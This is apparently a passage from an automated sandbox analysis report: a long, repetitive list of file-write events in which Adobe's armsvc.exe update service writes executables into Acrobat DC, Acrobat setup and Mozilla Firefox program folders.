Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
